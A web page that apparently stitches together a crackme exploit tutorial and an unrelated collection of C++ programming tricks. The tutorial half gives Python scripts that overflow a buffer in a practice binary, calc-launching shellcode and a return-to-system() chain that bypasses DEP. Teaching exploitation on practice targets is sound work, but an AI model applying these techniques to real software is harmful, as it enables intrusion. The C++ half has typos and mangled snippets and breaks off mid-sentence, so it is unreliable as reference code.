Bypass Data Execution Protection (DEP)

Hey folks! this topic details how to overflow a buffer, bypass DEP (Data Execution Prevention) and take control of the executable

Recommended Prerequisites

  • C/C++ language, a basic level would be fine
  • x86 Intel Assembly
  • Familiarity with Buffer Overflow
  • Debuggers/Disassembly

The binary

File 40
Virustotal 22

Okay, first thing we need to do is see what the executable brings us, so we run it.

r_opt

Here we see that it is asking for a file file.dat but as it does not exist it tells us that it cannot be opened, Once created we see that it shows us a message with 3 values at 0 that seem to correspond to 3 variables (cookie, cookie2 and size) and nothing else.

Since we don’t know what it does, let’s take a look at it.

This function has 5 variables, 4 of which are initialized at 0 and one at 32h (“2”), there is a pointer to LoadLibrary that is stored in 0x10103024 then makes a fopen to “fichero.dat” file in binary read mode, stores the FILE pointer in 0x10103020 and finally checks if it exists, if it does not exist it will go to 0x101010d3 and closes (as we saw before) and if it exists it goes to 0x101010e9, let’s look there

function2_opt(1)

Ok, in this procedure it first reads 4 bytes of fichero.dat with fread and stores them in a pointer to a block of memory look 10 (ebp-c), fread returns the total number of elements read and stores it in ebp-8, it does fread of 4 bytes again for the file and stores them in a pointer to ebp-10 then it does it one more time of 1 byte and stores it in a pointer to ebp-1, finally it compares this byte with [ebp-14] which is 32h (“2”) and if it is less than or equal (jle) it goes to 0x10101155 if it doesn’t, show a message saying “Nos fuimos al carajo” (We’re going to fuck off) and it closes.

Then we write in the file 8 bytes + the correct byte (“2”) and we enter 0x10101155, for example:

1234 + 5678 + 2

function3_opt

Well, here it pushes the saved bytes with fread and prints them, allocates 50 bytes (32h) of memory with malloc, stores the pointer to the allocated memory in ebp-1c then push the first 8 bytes of “fichero.dat” to 0x10101010, let’s look over there

function4_opt

Okay, what it does here is it takes the first 4 bytes of fichero.dat and adds them to the following 4 bytes then the result is compared to 58552433h, if the condition is correct, loads “pepe.dll”, then let’s make sure the condition is met (as it is little endian we have to put the bytes at backwards)

As not all characters meet the condition as “0” (30h) +»(» (28h) = 58h (1 byte correct) we do a script that does it and ready

data = "\x21\x1210" + "\x12\x12$(" + "2"
with open("fichero.dat", "w") as file:
	file.write(data)

Okay, this must meet the condition, let’s see.

check58_opt

Well, let’s see what’s it now.

buffer_opt

Once we leave 0x10101010 we see that it reads [ebp-1] bytes of fichero.dat with fread and stores it in a buffer pointing to (ebp-54), Okay, here’s a buffer overflow, let’s analyze it.

First we saw that the ninth byte of “fichero.dat” was stored in [ebp-1], then compared to [ebp-14] (“2”)

anal1_opt(1)

Well, now we see that that byte ([ebp-1]) is used as size of fread that will store that number of bytes (size) in a buffer (ebp-54) of 52 bytes, as the nearest variable is ebp-20, [ebp-54] — [ebp-20] = [ebp-34], so 34h (52d), we can also see it in the IDA stack, right click -> array -> ok

buffer_opt(1)

idastack_opt(1)

Okay, knowing all that, how could we overflow the buffer?

[ebp-1] is the ninth byte of fichero.dat, the size of fread for store in the buffer [ebp-54] and must also be less than or equal to 32h (“2”).

So we know that negative numbers in hexadecimal are higher in decimal, so if we put a negative number in hexadecimal it would allow us to enter more bytes than allowed (52d) and this is because it is signed (jle)

0x10101139 movsx ecx,  byte ptr ss:[ebp-1]
0x1010113d cmp ecx,    dword ptr ss:[ebp-14]
0x10101140 jle         stack9b.10101155

Let’s try to get to the edge of the buffer and at the same time overflowing 2 bytes of the fread stipulation (50 bytes, 32h).

data = "\x21\x1210" + "\x12\x12$(" + "\xff" + "A" * 52

with open("fichero.dat", "w") as file:
	file.write(data)

ff_opt
ffstack_opt

Cool!!! Let’s see what else there is to see if we can control the retn.

Well, now there is a procedure where it copy the buffer bytes [ebp-54] for the block in memory allocated by malloc [ebp-1c]

So, if I fill out [ebp-1c] with “\x41x41x41\x41” he won’t be able to write because it’s not a valid address, let’s find one that is.

ywrite_opt

All right, let’s check the stack, see how many bytes it takes to get to the start of retn and control it.

88b_opt

Okay, let’s set up our exploit

import subprocess

shellcode ="\xB8\x40\x50\x03\x78\xC7\x40\x04"+ "calc" + "\x83\xC0\x04\x50\x68\x24\x98\x01\x78\x59\xFF\xD1"

buff = "\x41" * 52
ebp_20 = "\x41" * 4
ebp_1c = "\x30\x30\x10\x10"    # Address with write permission
ebp_18 = "\x41" * 4
ebp_14 = "\x41" * 4
ebp_10 = "\x41" * 4
ebp_c = "\x41" * 4
ebp_8 = "\x41" * 4
ebp_4 = "\x41" * 4
s = "\x41" * 4    # ebp
r = shellcode


data = "\x21\x1210" + "\x12\x12$(" + "\xff" + buff + ebp_20 + ebp_1c + ebp_18 + ebp_14 + ebp_10 + ebp_c + ebp_8 + ebp_4 + s + r

with open("fichero.dat", "w") as file:
	file.write(data)

subprocess.call(r"stack9b.exe")

Well, we already have EIP under control but now it doesn’t allow me to execute my shellcode, this is due to DEP (data execution prevention).

Summarizing up, DEP changes the permissions of the segments where data is stored to prevent us from executing code there -ricnar

So to bypass the DEP we can do ROP (return oriented programming) which is basically using gadgets that are program’s executable code to change the stack permissions with some api like VirtualProtect or VirtualAlloc

Looking for gadgets in pepe.dll I couldn’t find VirtualAlloc, but there is a pointer to system() , would only be missing a return that can be exit() and a fixed place that we can control to pass it a string to system()

system_opt(1)
exit_opt

Now only the string for system() would be missing, we can use the address with write permission

calc_opt(1)

Here I set up the stack because malloc only assigned 50 bytes and then had no control over the eip and that’s how the exploit would look.

import subprocess

system = "\x24\x98\x01\x78"    # system()
calc = "calc.exe"

buff = "\x41" * 42
#ebp_20 = "\x41" * 4
ebp_1c = "\x30\x30\x10\x10"    # Address with write permission
ebp_18 = "\x41" * 4
ebp_14 = "\x41" * 4
ebp_10 = "\x41" * 4
ebp_c = "\x41" * 4
ebp_8 = "\x41" * 4
ebp_4 = "\x41" * 4
s = "\x41" * 4    # ebp
r = system
exit = "\x78\x1d\x10\x10"    # exit()
ptr_calc = "\x5a\x30\x10\x10"



data = "\x21\x1210" + "\x12\x12$(" + "\xff" + buff + calc + "\x41" * 6 +  ebp_1c + ebp_18 + ebp_14 + ebp_10 + ebp_c + ebp_8 + ebp_4 + s + r + exit + ptr_calc

with open("fichero.dat", "w") as file:
	file.write(data)

subprocess.call(r"stack9b.exe")
Реклама

What are some fun C++ tricks

This one applies to all languages so far:

a=a+b-(b=a);

A REALLY fast way of swaping a and b.

#include <iostream>
#include <string>

using namespace std;

int main (int argc, char*argv) {
float a; cout << «A:»; cin >> a;
float b; cout << «B:» ; cin >> b;

cout << «———————» << endl;
cout << «A=» << a << «, B=» << b << endl;
a=a+b-(b=a);
cout << «A=» << a << «, B=» << b << endl;
exit(0);
}


void Send(int * to, const int* from, const int count)

{

   int n = (count+7) / 8;

   switch(count%8)

   {

      case 0:

         do

            {

               *to++ = *from++;

      case 7:

               *to++ = *from++;

      case 6:

               *to++ = *from++;

      case 5:

               *to++ = *from++;

      case 4:

               *to++ = *from++;

      case 3:

               *to++ = *from++;

      case 2:

               *to++ = *from++;

      case 1:

               *to++ = *from++;

              } while (—n>0);

    }

}


Preprocessor Tricks

The arraysize macro used in Chrome’s source:

  1. template <typename T, size_t N>
  2. char (&ArraySizeHelper(T (&array)[N]))[N];
  3. #define arraysize(array) (sizeof(ArraySizeHelper(array)))

This is better than the ordinary sizeof(array)/sizeof(array[0]) because it raises compilation errors when the passed in array is just a pointer, or a null pointer whereas the simpler macro silently returns a useless value. For a detailed example, see PVS-Studio vs Chromium.

Predefined Macros:

  1. #define expect(expr) if(!expr) cerr << «Assertion « << #expr \
  2. » failed at « << __FILE__ << «:» << __LINE__ << endl;
  3. #define stringify(x) #x
  4. #define tostring(x) stringify(x)
  5. #define MAGIC_CONSTANT 314159
  6. cout << «Value of MAGIC_CONSTANT=» << tostring(MAGIC_CONSTANT);

The tostring macro is a common trick used to expand macro values inside other macros. The Linux kernel uses a lot of macro tricks.

Using iterators for quickly dumping the contents of a container:

  1. #define dbg(v) copy(v.begin(), v.end(), ostream_iterator<typeof(*v.begin())>(cout, » «))

Sadly, this doesn’t work for pair types so maps are out of scope.

Template Voodoo

Recursion:You can specialize your class templates for certain cases, so you can write down the base-case of a recursion and then define the generic template as a recursive combination of base cases.
For example, the following code calculates the values of the Choose function at compile time:

  1. template<unsigned n, unsigned r>
  2. struct Choose {
  3. enum {value = (n * Choose<n1, r1>::value) / r};
  4. };
  5. template<unsigned n>
  6. struct Choose<n, 0> {
  7. enum {value = 1};
  8. };
  9. int main() {
  10. // Prints 56
  11. cout << Choose<8, 3>::value;
  12. // Compile time values can be used as array sizes
  13. int x[Choose<25, 3>::value];
  14. }

More interesting examples at C++ Programming/Templates/Template Meta-Programming

Mostly Painless Memory Management and RAII

With certain restrictions, you can create templates for «smart» pointers that automatically deallocate resources when they go out of scope or reference count goes to 0. This is basically done by overloading operator * and operator =. Based on your use case, you can transfer ownership when the operator = is used, or update reference counts.
See Smart Pointer Guidelines — The Chromium Projects and http://code.google.com/searchfra…

Argument-dependent name lookup aka Koenig lookup

When a function call cannot be matched to a name in the current namespace, other namespaces can be searched for a matching signature. This is why std::cout << "Hi"; works even though operator << is defined in the stdnamespace.
See Argument-dependent name lookup


auto keyword
In C++ you can use auto to iterate over map,vector,set,..etc which specifies that the type of the variable that is being declared will be automatically deduced from its initializer or for functions it will the return type or it will be deduced from its return statements
So instead of :

  1. vector<int> vs;
  2. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  3. for (vector<int>::iterator it = vs.begin(); it != vs.end(); ++it)
  4. cout << *it << ‘ ‘;cout<<‘\n’;

just use :

  1. vector<int> vs;
  2. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  3. for (auto it: vs)
  4. cout << it << ‘ ‘;cout<<endl;
  5. //you can also change the values using
  6. vector<int> vs;
  7. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  8. for (auto& it: vs) it*=3;
  9. for (auto it: vs)
  10. cout << it << ‘ ‘;cout<<endl;

Declaring variable

  1. template<class A, class B>
  2. auto mult(A x, B y) -> decltype(x * y){
  3. return x * y;
  4. }
  5. int main(){
  6. auto a = 3 * 2; //the return type is the type of operator (x*y)
  7. cout<<a<<endl;
  8. return 0;
  9. }

The Power of Strings 

  1. int n,m;
  2. cin >> n >> m;
  3. int matrix[n+1][m+1];
  4. //This loop
  5. for(int i = 1; i <= n; i++) {
  6. for(int j = 1; j <= m; j++)
  7. cout << matrix[i][j] << » «;
  8. cout << «\n»;
  9. }
  10. // is equivalent to this
  11. for(int i = 1; i <= n; i++)
  12. for(int j = 1; j <= m; j++)
  13. cout << matrix[i][j] << » \n»[j == m];

because " \n" is a char*," \n"[0] is ' ' and " \n"[1] is '\n'  .

Some Hidden function
__gcd(x, y)
you don’t need to code gcd function.

  1. cout<<__gcd(54,48)<<endl; //return 6

__builtin_ffs(x)
This function returns 1 + least significant 1-bit of x. If x == 0, returns 0. Here x is int, this function with suffix ‘l’ gets a long argument and with suffix ‘ll’ gets a long long argument.
e.g:  __builtin_ffs(10) = 2 because 10 is ‘…10 1 0′ in base 2 and first 1-bit from right is at index 1 (0-based) and function returns 1 + index.three)

Pairing tricks 

  1. pair<int, int> p;
  2. //This
  3. p = make_pair(1, 2);
  4. //equivalent to this
  5. p = {1, 2};
  6. //So
  7. pair<int, pair<char, long long> > p;
  8. //now easier
  9. p = {1, {‘a’, 2ll}};

Super include 
Simply use
#include <bits/stdc++.h>
This library includes many of libraries we do need  like algorithm, iostream, vector and many more. Believe me you don’t need to include anything else 😀 !!

Smart Pointers

Using smart pointers, we can make pointers to work in way that we don’t need to explicitly call delete. Smart pointer is a wrapper class over a pointer with operator like * and -> overloaded. The objects of smart pointer class look like pointer, but can do many things that a normal pointer can’t like automatic destruction (yes, we don’t have to explicitly use delete), reference counting and more.
The idea is to make a class with a pointer, destructor and overloaded operators like * and ->. Since destructor is automatically called when an object goes out of scope, the dynamically alloicated memory would automatically deleted (or reference count can be decremented).


You can put URIs in your C++ code and the compiler will not throw any error.

  1. #include <iostream>
  2. int main() {
  3. using namespace std;
  4. http://www.google.com
  5. int x = 5;
  6. cout << x;
  7. }

Explanation: Any identifier followed by a : becomes a (goto) label in C++. Anything followed by // becomes a comment so in the code above, http is a label and //google.com/is a comment. The compiler might throw a warning however, since the label is unutilized.


Don’t Confuse Assign (=) with Test-for-Equality (==).

This one is elementary, although it might have baffled Sherlock Holmes. The following looks innocent and would compile and run just fine if C++ were more like BASIC:

if (a = b)
cout << «a is equal to b.»;

Because this looks so innocent, it creates logic errors requiring hours to track down within a large program unless you’re on the lookout for it. (So when a program requires debugging, this is the first thing I look for.) In C and C++, the following is not a test for equality:

a = b

What this does, of course, is assign the value of b to a and then evaluate to the value assigned.
The problem is that a = b does not generally evaluate to a reasonable true/false condition—with one major exception I’ll mention later. But in C and C++, any numeric value can be used as a condition for “if” or “while.
Assume that a and b are set to 0. The effect of the previously-shown if statement is to place the value of b into a; then the expression a = b evaluates to 0. The value 0 equates to false. Consequently, aand b are equal, but exactly the wrong thing gets printed:

if (a = b)     // THIS ENSURES a AND b ARE EQUAL…
cout << «a and b are equal.»;
else
cout << «a and b are not equal.»;  // BUT THIS GETS PRINTED!

The solution, of course, is to use test-for-equality when that’s what you want. Note the use of double equal signs (==). This is correct inside a condition.

// CORRECT VERSION:
if (a == b)
cout << «a and b are equal.»;


The most amazing trick i found was a status of someone’s topcoder profile:
Code:
#include <cstdio>
double m[]= {7709179928849219.0, 771};
int main()
{
m[1]—?m[0]*=2,main():printf((char*)m);
}
You will be seriously amazed by the ouput…here it is:
C++Sucks

I tried to analyse the code and came up with a reason but not an exact explanation..so i tried to ask it on stackoverflow..you can go through the explanation here:
Concept behind this 4 lines tricky C++ code
Read it and you will learn something you wouldn’t have even thought of… 😉


  1. static const unsigned char BitsSetTable256[256] =
  2. {
  3. # define B2(n) n, n+1, n+1, n+2
  4. # define B4(n) B2(n), B2(n+1), B2(n+1), B2(n+2)
  5. # define B6(n) B4(n), B4(n+1), B4(n+1), B4(n+2)
  6. B6(0), B6(1), B6(1), B6(2)
  7. };
  8. unsigned int v; // count the number of bits set in 32-bit value v
  9. unsigned int c; // c is the total bits set in v
  10. // Option 1:
  11. c = BitsSetTable256[v & 0xff] +
  12. BitsSetTable256[(v >> 8) & 0xff] +
  13. BitsSetTable256[(v >> 16) & 0xff] +
  14. BitsSetTable256[v >> 24];
  15. // Option 2:
  16. unsigned char * p = (unsigned char *) &v;
  17. c = BitsSetTable256[p[0]] +
  18. BitsSetTable256[p[1]] +
  19. BitsSetTable256[p[2]] +
  20. BitsSetTable256[p[3]];
  21. // To initially generate the table algorithmically:
  22. BitsSetTable256[0] = 0;
  23. for (int i = 0; i < 256; i++)
  24. {
  25. BitsSetTable256[i] = (i & 1) + BitsSetTable256[i / 2];
  26. }

 

 

  1. float Q_rsqrt( float number )
  2. {
  3. long i;
  4. float x2, y;
  5. const float threehalfs = 1.5F;
  6. x2 = number * 0.5F;
  7. y = number;
  8. i = * ( long * ) &y; // evil floating point bit level hacking
  9. i = 0x5f3759df - ( i >> 1 ); // what the fuck?
  10. y = * ( float * ) &i;
  11. y = y * ( threehalfs - ( x2 * y * y ) ); // 1st iteration
  12. // y = y * ( threehalfs - ( x2 * y * y ) ); // 2nd iteration, this can be removed
  13. return y;
  14. }

Iteration: 

  1. #define FOR(i,n) for(int (i)=0;(i)<(n);(i)++)
  2. #define FORR(i,a,b) for(int (i)=(a);(i)<(b);(i)++)
  3. //reverse
  4. #define REV(i,n) for(int (i)=(n)-1;(i)>=0;(i)--)

Handy way to use it like this. 

  1. typedef long long int int64;
  2. typedef unsigned long long int uint64;

FastIO for +ve integers.

    1. inline void frint(int *a){
    2. register char c=0;while (c<33) c=getchar_unlocked();*a=0;
    3. while (c>33){*a=*a*10+c-'0';c=getchar_unlocked();}
    4. }

Try This….

#include <iostream>
using namespace std;
int main()
{
int a,b,c;
int count = 1;
for (b=c=10;a=»- FIGURE?, UMKC,XYZHello Folks,\
TFy!QJu ROo TNn(ROo)SLq SLq ULo+\
UHs UJq TNn*RPn/QPbEWS_JSWQAIJO^\
NBELPeHBFHT}TnALVlBLOFAkHFOuFETp\
HCStHAUFAgcEAelclcn^r^r\\tZvYxXy\
T|S~Pn SPm SOn TNn ULo0ULo#ULo-W\
Hq!WFs XDt!» [b+++21]; )
for(; a— > 64 ; )
putchar ( ++c==’Z’ ? c = c/ 9:33^b&1);
return 0;
}


I think one of the coolest of all time, is defining an abstract base class in C++, and inheriting from it in python, and passing it back to C++ to call.
It actually works

  1. struct Interface{
  2. int foo()const=0;
  3. virtual ~Interface(){}
  4. };
  5. void call(Interface const& f){
  6. std::cout<<f.foo()<<std::endl;
  7. }
  8. struct InterfaceWrap final: Interface, boost::python::wrapper<Interface>
  9. {
  10. int foo() const final
  11. {
  12. return this->get_override("foo")();
  13. }
  14. };
  15. BOOST_PYTHON_MODULE(interface){
  16. using namespace boost::python;
  17. class_<Interface ,boost ::noncopyable,boost::shared_ptr<Interface>>("_InterfaceCpp",no_init)
  18. .def("foo",&Interface::foo)
  19. ;
  20. class_<InterfaceWrap ,bases<Interface>,boost::shared_ptr<InterfaceWrap>>("Interface",init<>())
  21. ;
  22. def("call",&call);
  23. }

and then

  1. import interface as i # C++ code
  2. class impl(i.Interface):#inherit from C++ class
  3. def __init__(self):
  4. i.Interface.__init__(self)
  5. def foo(self):
  6. return 100
  7. i.call(impl())#call C++ function with Python derived class

This does exactly what you think it should do.


void qsort ( void * base, size_t num, size_t size, int ( * compar ) ( const void *, const void * ) )

base Pointer to the first element of the array to be sorted.

num Number of elements in the array pointed by base. size_t is an unsigned integral type.

size Size in bytes of each element in the array. size_t is an unsigned integral type.

compar Function that compares two elements. This function is called repeatedly by qsorttocomparetwoelements.It shall follow the following prototype:

int compar ( const void * elem1, const void * elem2 );

Taking a pointer to two pointers as arguments (both type-casted to const void*). The function should compare the data pointed by both: if they match in ranking, the function shall return zero; if elem1 goes before elem2, it shall return a negative value; and if it goes after, a positive value.

Eg :

int values[] = { 40, 10, 100, 90, 20, 25 };

int compare (const void * a, const void * b) { return ( *(int*)a — *(int*)b ); }

int main () {
int n;
qsort (values, 6, sizeof(int), compare);
for (n=0; n<6; n++) printf («%d «,values[n]); return 0; }


Partial template specialization

C++11 has this cool function get<J> which can be used to access the first and second member of a pair, with a different syntax:

  1. std::pair < std::string, double > pr ( «pi», 3.14 );
  2. std::cout << std::get < 0 > ( pr ); // outputs «pi»
  3. std::cout << std::get < 1 > ( pr ); // outputs 3.14

Note that this is a function and not a function object or a member function.

I do not find it trivial to write a function

  • with three template types template < size_t J, class T1, class T2 >
  • which can get std::pair < T1, T2 > as an argument
  • and outputs pr.first if the template value J is 0
  • and outputs pr.second if the template value J is 1.

In particular consider that in C++ one cannot overload a function based on its return type. So what should the return type of this function be declared as? T1 or T2?

  1. template < size_t J, class T1, class T2>
  2. ??? get ( std::pair < T1, T2 > & );

The interesting thing is that one could already write this function in C++98 using Partial template specialization, which is a really cool trick. The problem is that function templates cannot be partially specialized, but this is easy to solve:

  1. namespace
  2. {
  3. /*!
  4. * helper template to do the work with partial specialization
  5. */
  6. template < size_t J, class T1, class T2 >
  7. struct Get;
  8. template < class T1, class T2>
  9. struct Get < 0, T1, T2 >
  10. {
  11. typedef typename std::pair < T1, T2 >::first_type result_type;
  12. static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.first; }
  13. static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.first; }
  14. };
  15. template < class T1, class T2>
  16. struct Get < 1, T1, T2 >
  17. {
  18. typedef typename std::pair < T1, T2 >::second_type result_type;
  19. static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.second; }
  20. static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.second; }
  21. };
  22. }
  23. template < size_t J, class T1, class T2 >
  24. typename Get< J, T1, T2 >::result_type & get ( std::pair< T1, T2 > & pr )
  25. {
  26. return Get < J, T1, T2 >::elm( pr );
  27. }
  28. template < size_t J, class T1, class T2 >
  29. const typename Get< J, T1, T2 >::result_type & get ( const std::pair< T1, T2 > & pr )
  30. {
  31. return Get < J, T1, T2 >::elm( pr );
  32. }

Define operator<< for STL structures to make it easy to add debug outputs to your code. (This is better than special printing functions because it nests automatically! Printing a map< vector<int>, int> works without any additional effort if you can print any map and any vector.)

Additionally, define a macro that makes nicer debug outputs and makes it easy to turn them off using the standard mechanism (same one that is used for assert). Here’s a short example how to do all of this in C++11:

  1. #include <iostream>
  2. #include <string>
  3. #include <map>
  4. #ifdef NDEBUG
  5. #define DEBUG(var)
  6. #else
  7. #define DEBUG(var) { std::cout << #var << ": " << (var) << std::endl; }
  8. #endif
  9. template<typename T1, typename T2>
  10. std::ostream& operator<< (std::ostream& out, const std::map<T1,T2> &M) {
  11. out << "{ ";
  12. for (auto item:M) out << item.first << "->" << item.second << ", ";
  13. out << "}";
  14. return out;
  15. }
  16. int main() {
  17. std::map<std::string,int> age = { {"Joe",47}, {"Bob",22}, {"Laura",19} };
  18. DEBUG(age);
  19. }

This is a very amazing piece of code:

main(a){printf(a,34,a=»main(a){printf(a,34,a=%c%s%c,34);}»,34);}

It is the shortest C++ code which when executed prints itself. It was discovered by Vlad Taeerov and Rashit Fakhreyev and is only 64 characters in length(Making it the shortest).


To Convert list<T> to vector<T>:

  1. std::vector<T> v(l.begin(), l.end());

 

Variadic Templates :

They can be useful in places. You can pass any number of parameters .
Example  :

  1. #include <iostream>
  2. #include <bitset>
  3. #include <string>
  4. using namespace std;
  5.  
  6. void print() {
  7. cout<<«Nothing to print :)» ;
  8. }
  9.  
  10. template<typename T,typename args>
  11. void print(T x,args y) {
  12. cout<<x<<endl;
  13. print(y…);
  14. }
  15.  
  16. int main() {
  17. print(10,14.56,«Quora»,bitset<20>(28));
  18. return 0;
  19. }

 

Code on ideon : http://ideone.com/b8TNHD

Output :

  1. 10
  2. 14.56
  3. Quora
  4. 00000000000000011100
  5. Nothing to print 🙂

 

Range based for loops can be used with some STL containers :
eg.

 

  1. #include <iostream>
  2. #include <list>
  3. #include <vector>
  4.  
  5. using namespace std;
  6.  
  7. int main() {
  8. list<int> x;
  9. x.push_back(10);
  10. x.push_back(20);
  11. for(auto i : x)
  12. cout<<i;
  13. return 0;
  14. }

Old but still C++ Tricks

I see lots of programmers write code like this one:

pair<int, int> p;
vector<int> v;
// ...
p = make_pair(3, 4);
v.push_back(4); v.push_back(5);

while you can just do this:

pair<int, int> p;
vector<int> v;
// ...
p = {3, 4};
v = {4, 5};

1. Assign value by a pair of {} to a container

I see lots of programmers write code like this one:

pair<int, int> p;
// ...
p = make_pair(3, 4);

while you can just do this:

pair<int, int> p;
// ...
p = {3, 4};

even a more complex pair

pair<int, pair<char, long long> > p;
// ...
p = {3, {'a', 8ll}};

What about vectordequeset and other containers?


vector<int> v;
v = {1, 2, 5, 2};
for (auto i: v)
    cout << i << ' ';
cout << '\n';
// prints "1 2 5 2"


deque<vector<pair<int, int>>> d;
d = {{{3, 4}, {5, 6}}, {{1, 2}, {3, 4}}};
for (auto i: d) {
    for (auto j: i)
        cout << j.first << ' ' << j.second << '\n';
    cout << "-\n";
}
// prints "3 4
//         5 6
//         -
//	   1 2
//	   3 4
//	   -"


set<int> s;
s = {4, 6, 2, 7, 4};
for (auto i: s)
    cout << i << ' ';
cout << '\n';
// prints "2 4 6 7"


list<int> l;
l = {5, 6, 9, 1};
for (auto i: l)
    cout << i << ' ';
cout << '\n';
// prints "5 6 9 1"


array<int, 4> a;
a = {5, 8, 9, 2};
for (auto i: a)
    cout << i << ' ';
cout << '\n';
// prints "5 8 9 2"


tuple<int, int, char> t;
t = {3, 4, 'f'};
cout << get<2>(t) << '\n';

Note that it doesn’t work for stack and queue.

2. Name of argument in macros

You can use ‘#’ sign to get exact name of an argument passed to a macro:

#define what_is(x) cerr << #x << " is " << x << endl;
// ...
int a_variable = 376;
what_is(a_variable);
// prints "a_variable is 376"
what_is(a_variable * 2 + 1)
// prints "a_variable * 2 + 1 is 753"

3. Get rid of those includes!

Simply use

#include <bits/stdc++.h>

This library includes many of libraries we do need in contest like algorithmiostreamvector and many more. Believe me you don’t need to include anything else!

4. Hidden function (not really hidden but not used often)

one)

__gcd(value1, value2)

You don’t need to code Euclidean Algorithm for a gcd function, from now on we can use. This function returns gcd of two numbers.

e.g. __gcd(18, 27) = 9.

two)

__builtin_ffs(x)

This function returns 1 + least significant 1-bit of x. If x == 0, returns 0. Here x is int, this function with suffix ‘l’ gets a long argument and with suffix ‘ll’ gets a long long argument.

e.g. __builtin_ffs(10) = 2 because 10 is ‘…10 1 0′ in base 2 and first 1-bit from right is at index 1 (0-based) and function returns 1 + index.

three)

__builtin_clz(x)

This function returns number of leading 0-bits of x which starts from most significant bit position. x is unsigned int and like previous function this function with suffix ‘l gets a unsigned long argument and with suffix ‘ll’ gets a unsigned long long argument. If x == 0, returns an undefined value.

e.g. __builtin_clz(16) = 27 because 16 is ‘  10000′. Number of bits in a unsigned int is 32. so function returns 32 — 5 = 27.

four)

__builtin_ctz(x)

This function returns number of trailing 0-bits of x which starts from least significant bit position. x is unsigned int and like previous function this function with suffix ‘l’ gets a unsigned long argument and with suffix ‘ll’ gets a unsigned long long argument. If x == 0, returns an undefined value.

e.g. __builtin_ctz(16) = 4 because 16 is ‘…1 0000 ‘. Number of trailing 0-bits is 4.

five)

__builtin_popcount(x)

This function returns number of 1-bits of x. x is unsigned int and like previous function this function with suffix ‘l’ gets a unsigned long argument and with suffix ‘ll’ gets a unsigned long long argument. If x == 0, returns an undefined value.

e.g. __builtin_popcount(14) = 3 because 14 is ‘… 111 0′ and has three 1-bits.

Note: There are other __builtin functions too, but they are not as useful as these ones.

Note: Other functions are not unknown to bring them here but if you are interested to work with them, I suggest this website.

5. Variadic Functions and Macros

We can have a variadic function. I want to write a sum function which gets a number of ints, and returns sum of them. Look at the code below:

int sum() { return 0; }

template<typename... Args>
int sum(int a, Args... args) { return a + sum(args...); }

int main() { cout << sum(5, 7, 2, 2) + sum(3, 4); /* prints "23" */ }

In the code above I used a template. sum(5, 7, 2, 2) becomes 5 + sum(7, 2, 2) then sum(7, 2, 2), itself, becomes 7 + sum(2, 2) and so on… I also declare another sum function which gets 0 arguments and returns 0.

I can even define a any-type sum function:

int sum() { return 0; }

template<typename T, typename... Args>
T sum(T a, Args... args) { return a + sum(args...); }

int main() { cout << sum(5, 7, 2, 2) + sum(3.14, 4.89); /* prints "24.03" */ }

Here, I just changed int to T and added typename T to my template.

In C++14 you can also use auto sum(T a, Args... args) in order to get sum of mixed types. (Thanks to slycelote and Corei13)

We can also use variadic macros:

#define a_macro(args...) sum(args...)

int sum() { return 0; }

template<typename T, typename... Args>
auto sum(T a, Args... args) { return a + sum(args...); }

int main() { cout << a_macro(5, 7, 2, 2) + a_macro(3.14, 4.89); /* prints "24.03" */ }

Using these 2, we can have a great debugging function: (thanks to Igorjan94) — Updated!

#include <bits/stdc++.h>

using namespace std;

#define error(args...) { string _s = #args; replace(_s.begin(), _s.end(), ',', ' '); stringstream _ss(_s); istream_iterator<string> _it(_ss); err(_it, args); }

void err(istream_iterator<string> it) {}
template<typename T, typename... Args>
void err(istream_iterator<string> it, T a, Args... args) {
	cerr << *it << " = " << a << endl;
	err(++it, args...);
}

int main() {
	int a = 4, b = 8, c = 9;
	error(a, b, c);
}

Output:

a = 4
b = 8
c = 9

This function helps a lot in debugging.

6. Here is C++0x in CF, why still C++?

Variadic functions also belong to C++11 or C++0x, In this section I want to show you some great features of C++11.

one) Range-based For-loop

Here is a piece of an old code:

set<int> s = {8, 2, 3, 1};
for (set<int>::iterator it = s.begin(); it != s.end(); ++it)
    cout << *it << ' ';
// prints "1 2 3 8"

Trust me, that’s a lot of code for that, just use this:

set<int> s = {8, 2, 3, 1};
for (auto it: s)
    cout << it << ' ';
// prints "1 2 3 8"

We can also change the values just change auto with auto &:

vector<int> v = {8, 2, 3, 1};
for (auto &it: v)
    it *= 2;
for (auto it: v)
    cout << it << ' ';
// prints "16 4 6 2"

two) The Power of auto

You don’t need to name the type you want to use, C++11 can infer it for you. If you need to loop over iterators of a set<pair<int, pair<int, int> > > from begin to end, you need to type set<pair<int, pair<int, int> > >::iterator for me it’s so suffering! just use auto it = s.begin()

also x.begin() and x.end() now are accessible using begin(x) and end(x).

There are more things. I think I said useful features. Maybe I add somethings else to post. If you know anything useful please share with Codeforces community 🙂

From Ximera‘s comment:

this code:

for(i = 1; i <= n; i++) {
    for(j = 1; j <= m; j++)
        cout << a[i][j] << " ";
    cout << "\n";
}

is equivalent to this:

for(i = 1; i <= n; i++)
    for(j = 1; j <= m; j++)
        cout << a[i][j] << " \n"[j == m];

And here is the reason: " \n" is a char*" \n"[0] is ' ' and " \n"[1] is '\n'.

From technetium28‘s comment:

Usage of tie and emplace_back:

#define mt make_tuple
#define eb emplace_back
typedef tuple<int,int,int> State; // operator< defined

int main(){
  int a,b,c;
  tie(a,b,c) = mt(1,2,3); // assign
  tie(a,b) = mt(b,a); // swap(a,b)

  vector<pair<int,int>> v;
  v.eb(a,b); // shorter and faster than pb(mp(a,b))

  // Dijkstra
  priority_queue<State> q;
  q.emplace(0,src,-1);
  while(q.size()){
    int dist, node, prev;
    tie(dist, ode, prev) = q.top(); q.pop();
    dist = -dist;
    // ~~ find next state ~~
    q.emplace(-new_dist, new_node, node);
  }
}

And that’s why emplace_back faster: emplace_back is faster than push_back ’cause it just construct value at the end of vector but push_back construct it somewhere else and then move it to the vector.

Also in the code above you can see how tie(args...) works. You can also use ignore keyword in tie to ignore a value:

tuple<int, int, int, char> t (3, 4, 5, 'g');
int a, b;
tie(b, ignore, a, ignore) = t;
cout << a << ' ' << b << '\n';

Output: 5 3

I use this macro and I love it:

